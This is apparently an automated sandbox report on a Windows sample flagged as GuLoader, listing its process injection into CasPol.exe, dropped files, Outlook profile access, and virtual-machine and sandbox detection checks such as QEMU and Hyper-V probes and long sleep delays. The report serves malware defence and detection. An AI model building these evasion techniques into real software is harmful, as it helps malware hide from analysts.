Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Jump to behavior

Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

0_2_0040352D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Undertegnelse

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

File created: C:\Users\user\AppData\Local\Temp\nsnA919.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/11@4/3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040498A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:304:WilStaging_02

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.900199931.0000000001390000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_70B230C0 push eax; ret	0_2_70B230EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC7E28 push cs; ret	0_2_02AC7EAD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC7E50 push cs; ret	0_2_02AC7EAD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC53D4 push ebx; iretd	0_2_02AC53D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC20E7 push cs; retf	0_2_02AC2120
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC218F push cs; retf	0_2_02AC2120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012A2570 push esp; retf 1FDCh	4_2_012A27C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012A84BF push edi; retn 0000h	4_2_012A84C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1DA15DD3 push ds; ret	4_2_1DA15E83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_20AD718D pushad ; retf	4_2_20AD7199

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Code function: 0_2_70B21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_70B21BFF

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

File created: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Undertegnelse

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1103465912.0000000000698000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEB
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1104974887.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1104974887.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1103876242.00000000006CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4636

Thread sleep time: -9223372036854770s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Code function: 0_2_02AC02BF rdtsc

0_2_02AC02BF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9478

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 4_2_1DA10C40 sldt word ptr [eax]

4_2_1DA10C40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C49
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_00406873 FindFirstFileW,FindClose,	0_2_00406873
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	API call chain: ExitProcess graph end node			graph_0-9483
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	API call chain: ExitProcess graph end node			graph_0-9487

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\Husvildt\Eliteidrt\Remodified	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\FOLKESANGEREN\JACKROLLING	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp	Jump to behavior

Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1103465912.0000000000698000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeb
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1104974887.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000004.00000002.5728150845.0000000001635000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5726396411.00000000015DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1104974887.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1103876242.00000000006CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

